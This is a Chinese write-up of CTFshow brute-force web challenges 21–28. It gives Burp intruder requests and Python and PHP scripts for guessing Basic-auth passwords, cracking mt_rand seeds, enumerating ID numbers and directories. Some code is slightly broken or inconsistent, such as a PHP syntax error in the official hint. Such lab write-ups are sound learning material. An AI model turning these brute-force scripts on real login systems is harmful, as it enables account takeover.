【8道爆破简单练习题】CTFshow web20-28

本文最后更新于:2021年8月22日晚上7点57分

Web21

爆破什么的,都是基操

打开题目,直接就是一个登录框

image-20210822134634318

先截一个包看看,截取到的包如下:

1
2
3
4
5
6
7
8
9
GET / HTTP/1.1
Host: b81055e7-b4c4-4fa1-a996-7d3bdfd7db8e.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46YWRtaW4=

Authorization中的内容base64解码一下,可以发现就是刚刚输入的账号密码:

1
2
YWRtaW46YWRtaW4=
admin:admin

同时题目中给了一个文件,将文件下载重命名为zip.zip,文件内容如下:

image-20210822135234427

用bp爆破的POC如下:

1
2
3
4
5
6
7
8
9
GET / HTTP/1.1
Host: b81055e7-b4c4-4fa1-a996-7d3bdfd7db8e.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46§YWRtaW4=§

爆破的设置如下:

  • Payload Processing 设置 base64-encode

    image-20210822140353501

  • Payload Encoding 中等号去掉(防止base64编码生成的等号被URL编码)

    image-20210822140437760

最终得到的结果如下:

image-20210822140557505

不使用bp的话,用Python也可以,代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import time
import requests
import base64

url = "http://b81055e7-b4c4-4fa1-a996-7d3bdfd7db8e.challenge.ctf.show:8080"
f = open("dict.txt" , "r")
passwords = f.readlines()

for i in passwords:
payload = {
"Authorization" : "Basic YWRtaW46{}".format(base64.b64encode(i[:-1].encode()).decode())
}
res = requests.get(url , headers=payload )
if "ctfshow" in res.text:
print(res.text)

image-20210822150243638

官方Hint:

考点tomcat 认证爆破之custom iterator使用 https://www.cnblogs.com/007NBqaq/p/13220297.html 下载密码字典抓包,通过burpsuite暴力破解

Payload set —->custom iterator(自定义迭代器)

需要进行base64编码;payload processing 进行编码设置

取消Palyload Encoding编码 因为在进行base64加密的时候在最后可能存在 == 这样就会影响base64 加密的结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-11-20 19:16:49
# @Last Modified by: h1xa
# @Last Modified time: 2020-11-20 20:28:42
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

import time
import requests
import base64

url = 'http://41a801fe-a420-47bc-8593-65c3f26b7efa.chall.ctf.show/index.php'

password = []

with open("1.txt", "r") as f:
while True:
data = f.readline()
if data:
password.append(data)
else:
break



for p in password:
strs = 'admin:'+ p[:-1]
header={
'Authorization':'Basic {}'.format(base64.b64encode(strs.encode('utf-8')).decode('utf-8'))
}
rep =requests.get(url,headers=header)
time.sleep(0.2)
if rep.status_code ==200:
print(rep.text)
break

Web22

域名也可以爆破的,试试爆破这个ctf.show的子域名

利用这个网站查询子域名:在线子域名查询 (phpinfo.me)

image-20210822151206106

flag就在vip.ctf.show这个域名中:

image-20210822151239165

官方Hint:(没用)

http://flag.ctfer.com/index.php

Web23

还爆破?这么多代码,告辞!

打开题目:

image-20210822153811312

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 11:43:51
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 11:56:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);

include('flag.php');
if(isset($_GET['token'])){
$token = md5($_GET['token']);
if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
echo $flag;
}
}
}else{
highlight_file(__FILE__);

}
?>

爆破的poc如下:

1
2
3
4
5
6
7
8
9
10
11
<?php
for($i = 0 ; $i <= 10000 ; $i ++)
{
$token = md5($i);
if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
echo $i;
}
}
}
?>

image-20210822153853375

4221202都是我们要的结果,传参

1
?token=1202

image-20210822153923378

官方Hint:

查看源代码发现我们需要get一个token满足条件就可以出flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#coding: utf-8
#啊韬
import hashlib
dic = '0123456789qazwsxedcrfvtgbyhnujmikolp'
md5 = hashlib.md5(dic).hexdigest()
for a in dic:
for b in dic:
t = str(a)+str(b)
md5 = hashlib.md5(t).hexdigest()
#print md5
#print md5[1:2]
#print md5[14:15]
#print md5[17:18]
if md5[1:2] == md5[14:15] and md5[14:15]== md5[17:18]:
print t
print md5
print md5[1:2]
print md5[14:15]
print md5[17:18]

传递?token=3j

Web24

爆个🔨

打开题目:

image-20210822171735833

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 13:26:39
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 13:53:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
$r = $_GET['r'];
mt_srand(372619038);
if(intval($r)===intval(mt_rand())){
echo $flag;
}
}else{
highlight_file(__FILE__);
echo system('cat /proc/version');
}

?>

mt_srand一个随机数函数,一般来说不设置随机数种子,但是如果设置了,生成的随机数序列是固定的,因此我们在本地运行一下。

注意要使用PHP7.x的版本

1
2
3
4
<?php
mt_srand(372619038);
echo intval(mt_rand());
?>

得到的结果是:1155388967,传参即可得到flag

1
?r=1155388967

image-20210822172034643

官方Hint:

参考PHP随机数的伪随机数 mt_srand(seed); 函数播种 Mersenne Twister 随机数生成器。seed,可选。规定播种值

mt_scrand(seed)这个函数的意思,是通过分发seed种子,然后种子有了后,靠mt_rand()生成随机 数。 提示:从 PHP 4.2.0 开始,随机数生成器自动播种,因此没有必要使用该函数 因此不需要播种,并且如果设置了 seed参数 生成的随机数就是伪随机数,意思就是每次生成的随机数 是一样的

Web25

爆个🔨,不爆了

打开题目:

image-20210822172309135

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 13:56:57
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 15:47:33
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
$r = $_GET['r'];
mt_srand(hexdec(substr(md5($flag), 0,8)));
$rand = intval($r)-intval(mt_rand());
if((!$rand)){
if($_COOKIE['token']==(mt_rand()+mt_rand())){
echo $flag;
}
}else{
echo $rand;
}
}else{
highlight_file(__FILE__);
echo system('cat /proc/version');
}

分析程序,先传入**?r=0,得到rand的值,也就能得到第一次mt_rand()**的值

image-20210822173942329

因此第一次mt_rand()的值为:1245795688

利用php_mt_seed工具,爆破出原始随机数种子

image-20210822180634415

可以看到,原始随机数种子有:14397603542872552815

这里的两个mt_rand()与之前的mt_rand()不同,这里的分别是第2次第3次生成的随机数,而前面的是第1次

1
2
3
if($_COOKIE['token']==(mt_rand()+mt_rand())){
echo $flag;
}

因此在本地测试一下,跑出第2次第3次的随机数序列

1
2
3
4
5
6
<?php
mt_srand(1439760354);
echo mt_rand()."\n";
echo mt_rand()."\n";
echo mt_rand();
?>

得到:

1
2
3
1245795688
394229461
741102128

因此,需要传入的token为:1135331589(394229461+741102128)

但是1439760354这个不行,那就换一个2872552815

1
2
3
4
5
<?php
mt_srand(2280212934);
echo mt_rand()."\n";
echo mt_rand()+mt_rand();
?>

得到:

1
2
1245795688
2872552815

POC如下:

1
2
3
4
5
6
7
8
9
GET /?r=1245795688 HTTP/1.1
Host: 13b2a136-4658-48ed-8a26-2cd6c59a9ef9.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh
Accept-Encoding: gzip, deflate
Connection: close
Cookie: token=2872552815
Upgrade-Insecure-Requests: 1

image-20210822180819808

官方Hint:

https://www.openwall.com/php_mt_seed/ https://www.cnblogs.com/zaqzzz/p/9997855.html mt_scrand(seed)这个函数的意思,是通过分发seed种子,然后种子有了后,靠mt_rand()生成随机 数。 在之前自己还以为需要暴力破解cookie,最后师傅们给我介绍了一个脚本,专门用来跑mt_srand()种子和 mt_rand()随机数的 这里自己解释一下为什么每一次的mt_rand()+mt_rand()不是第一次的随机数相加?? 因为生成的随机数可以说是一个线性变换(实际上非常复杂)的每一次的确定的但是每一次是不一样的,所以不能 进行第一次*2就得到mt_rand()+mt_rand() 使用说只要我们得到种子就可以在本地进行获得自己想要的值 解题:通过随机数来寻找种子 我们让 ?r=0 得到随机数。这里我得到的是 183607393 每一次不一样(因为flag值在变化) 然后下载 php_mt_seed4.0 我们在linux下面使用 gcc进行编译 gcc php_mt_seed.c -o php_mt_seed 之后运行脚本添加随机数 ./php_mt_seed 183607393

找到对应的版本这里自己的运气好第一个出来的自己验证了一下发现就是这个 注:可能存在多个种子需要自己进行判断 通过种子找到第一个随机数就是上面的随机数。

payload: ?r=183607393 Cookie: token=794171094

Web26

这个可以爆

打开题目,进入安装页面:

image-20210822181534345

表面是一个安装,实际上是密码爆破

POC如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /checkdb.php HTTP/1.1
Host: 27ec50e4-ab0d-4ad8-bdeb-7a73543db810.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 43
Origin: http://27ec50e4-ab0d-4ad8-bdeb-7a73543db810.challenge.ctf.show:8080
Connection: close
Referer: http://27ec50e4-ab0d-4ad8-bdeb-7a73543db810.challenge.ctf.show:8080/install.php

a=localhost&p=3306&d=ctf&u=root&pass123456§

得到flag:

image-20210822181640862

官方Hint:

使用Chrome浏览器抓包,进行暴力破解密码

Web27

CTFshow菜鸡学院招生啦!

打开题目:

image-20210822181848436

下载录取名单,内容如下:

image-20210822181922685

学籍查询系统如下:

image-20210822181958468

老样子,还是bp爆破,POC如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /info/checkdb.php HTTP/1.1
Host: 939ee7e2-018f-414c-a4a2-357837724391.challenge.ctf.show:8080
Content-Length: 50
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://939ee7e2-018f-414c-a4a2-357837724391.challenge.ctf.show:8080
Referer: http://939ee7e2-018f-414c-a4a2-357837724391.challenge.ctf.show:8080/info/query.php?
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

a=%E5%B5%87%E5%BC%80%E6%A2%A6&p=360730§********§7653

爆破设置如下:

image-20210822192336595

爆破结果如下:

image-20210822192946300

1
\u606d\u559c\u60a8\uff0c\u60a8\u5df2\u88ab\u6211\u6821\u5f55\u53d6\uff0c\u4f60\u7684\u5b66\u53f7\u4e3a10167653\u521d\u59cb\u5bc6\u7801\u4e3a\u8eab\u4efd\u8bc1\u53f7\u7801

解码后为:

1
恭喜您,您已被我校录取,你的学号为10167653初始密码为身份证号码

10167653以及360730199110167653登录拿到flag

image-20210822193143467

官方Hint:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
//621022********5237
$myfile = fopen("zid.txt", "w") or die("Unable to open file!");
for($year=1990;$year<1993;$year++){
for($mon=1;$mon<10;$mon++){
for($day=01;$day<10;$day++)
{
$txt=('621022'.$year.'0'.$mon.'0'.$day.'5237')."\n";
fwrite($myfile, $txt);
}
}
}
for($year=1990;$year<1993;$year++){
for($mon=1;$mon<10;$mon++){
for($day=10;$day<=31;$day++)
{
$txt=('621022'.$year."0".$mon.$day.'5237')."\n";
fwrite($myfile, $txt);
}
}
}
for($year=1990;$year<1993;$year++){
for($mon=10;$mon<=12;$mon++)
{
for($day=10;$day<=31;$day+
{
$txt=('621022'.$year.$mon.$day.'5237')."\n";
fwrite($myfile, $txt);
}
}
}
for($year=1990;$year<1993;$year++){
for($mon=10;$mon<=12;$mon++){
for($day=01;$day<10;$day++)
{
$txt=('621022'.$year.$mon."0".$day.'5237')."\n";
fwrite($myfile, $txt);
}
}
}
fclose($myfile);

Web28

大海捞针

打开题目:

image-20210822193732380

随便输入一个3.txt,可以看到因为重定向次数过多,浏览器无法解析

image-20210822193758877

尝试爆破一下目录,POC如下:

1
2
3
4
5
6
7
8
9
10
GET /§0§/§1§/ HTTP/1.1
Host: b98a712c-e342-4258-b1fb-75d5d4c709de.challenge.ctf.show:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


bp的相关设置如下:

image-20210822194745871

image-20210822194756621

image-20210822194805209

跑完之后,得到flag:

image-20210822194830315

官方Hint:

通过暴力破解目录/0-100/0-100/看返回数据包

爆破的时候去掉2.txt 仅仅爆破目录即可